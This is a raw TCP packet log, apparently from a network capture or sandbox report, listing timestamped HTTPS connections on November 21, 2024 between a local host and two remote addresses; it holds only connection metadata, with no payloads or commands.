                                                                                                                                                                              Nov 21, 2024 08:32:00.204313040 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.204360008 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.204948902 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.204957008 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.241915941 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.245172024 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.245268106 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.245321989 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.245321989 CET50017443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.245340109 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.245349884 CET4435001713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.248127937 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.248173952 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.248260975 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.248377085 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.248397112 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.298940897 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.299422979 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.299455881 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.299880028 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.299885988 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.648025990 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.651204109 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.651293039 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.651323080 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.651338100 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.651361942 CET50018443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.651369095 CET4435001813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.654115915 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.654160023 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.654233932 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.654365063 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.654378891 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.743577003 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.746686935 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.746751070 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.746814966 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.746831894 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.746840954 CET50019443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.746846914 CET4435001913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.749423981 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.749459028 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.749531984 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.749666929 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.749684095 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.850327015 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.850872040 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.850883961 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:00.851329088 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:00.851332903 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.094003916 CET44349999142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.094172001 CET44349999142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.094244003 CET49999443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:32:01.293865919 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.296904087 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.296988010 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.297024012 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.297039032 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.297064066 CET50020443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.297070026 CET4435002013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.299772978 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.299815893 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.299887896 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.300024986 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.300041914 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.561358929 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.561954021 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.561968088 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.562443018 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.562448978 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.823795080 CET49999443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:32:01.823862076 CET44349999142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.981110096 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.981674910 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.981714964 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:01.982026100 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:01.982033968 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.098989964 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.099019051 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.099062920 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.099154949 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.099154949 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.207964897 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.207964897 CET50021443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.207999945 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.208009005 CET4435002113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.333120108 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.333149910 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.333209038 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.348087072 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.348100901 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.457818031 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.461030960 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.461127043 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.461218119 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.461218119 CET50022443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.461286068 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.461317062 CET4435002213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.463839054 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.464202881 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.464214087 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.464659929 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.464665890 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.465909004 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.465954065 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.466001987 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.466305971 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.466324091 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.498320103 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.498713017 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.498740911 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.499334097 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.499339104 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.899118900 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.902128935 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.902194023 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.902230978 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.902245045 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.902270079 CET50024443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.902276039 CET4435002413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.904946089 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.904989004 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.905056953 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.905203104 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.905215025 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.954514980 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.957603931 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.957647085 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.957746983 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.957746983 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.957948923 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.957948923 CET50023443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.957967043 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.957974911 CET4435002313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.960583925 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.960679054 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:02.960777998 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.960912943 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:02.960947037 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.079457045 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.079979897 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.080008984 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.080590010 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.080596924 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.524007082 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.527148962 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.527196884 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.527270079 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.527343988 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.527364969 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.527376890 CET50025443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.527384996 CET4435002513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.530242920 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.530282021 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:03.530356884 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.530472040 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:03.530483007 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.126945972 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.127840996 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.127859116 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.128313065 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.128318071 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.311290026 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.311732054 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.311764956 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.312199116 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.312205076 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.575927973 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.579015017 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.579081059 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.579121113 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.579130888 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.579163074 CET50026443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.579169035 CET4435002613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.581723928 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.581820011 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.581911087 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.582046986 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.582083941 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.690582037 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.693823099 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.693847895 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.694262981 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.694267988 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.702934027 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.712263107 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.712305069 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.712723017 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.712734938 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.764933109 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.768006086 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.768088102 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.769568920 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.769591093 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.769614935 CET50027443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.769622087 CET4435002713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.772192955 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.772218943 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:04.772279978 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.772413969 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:04.772428989 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.134705067 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.137696981 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.137763977 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.137816906 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.137835979 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.137845993 CET50028443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.137851954 CET4435002813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.138484001 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.140687943 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.140723944 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.140774012 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.140942097 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.140957117 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.141644001 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.141707897 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.141717911 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.141774893 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.141819000 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.141858101 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.141886950 CET50029443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.141901970 CET4435002913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.144330978 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.144381046 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.144447088 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.144654036 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.144670010 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.372867107 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.373450994 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.373476982 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.373908043 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.373913050 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.826376915 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.829485893 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.829550982 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.829595089 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.829622030 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.829632044 CET50030443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.829638004 CET4435003013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.832496881 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.832529068 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:05.832613945 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.832779884 CET50035443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:05.832794905 CET4435003513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.427714109 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.428287029 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.428356886 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.428725958 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.428742886 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.622788906 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.623409033 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.623420000 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.623821020 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.623826981 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.880667925 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.880831957 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.880923986 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.881011009 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.881062031 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.881102085 CET50031443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.881119013 CET4435003113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.884104967 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.884154081 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.884301901 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.884471893 CET50036443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.884491920 CET4435003613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.988176107 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.988634109 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.988652945 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.989196062 CET50034443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.989207983 CET4435003413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.991235971 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.991512060 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.991555929 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:06.991868019 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:06.991875887 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.081516027 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.081581116 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.081687927 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.081726074 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.081765890 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.081815958 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.082000017 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.082022905 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.082035065 CET50032443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.082041979 CET4435003213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.085135937 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.085195065 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.085304022 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.085484028 CET50037443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.085499048 CET4435003713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.443820000 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.443907976 CET4435003313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:32:07.443968058 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.444148064 CET50033443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:32:07.444165945 CET4435003313.107.246.45192.168.2.6
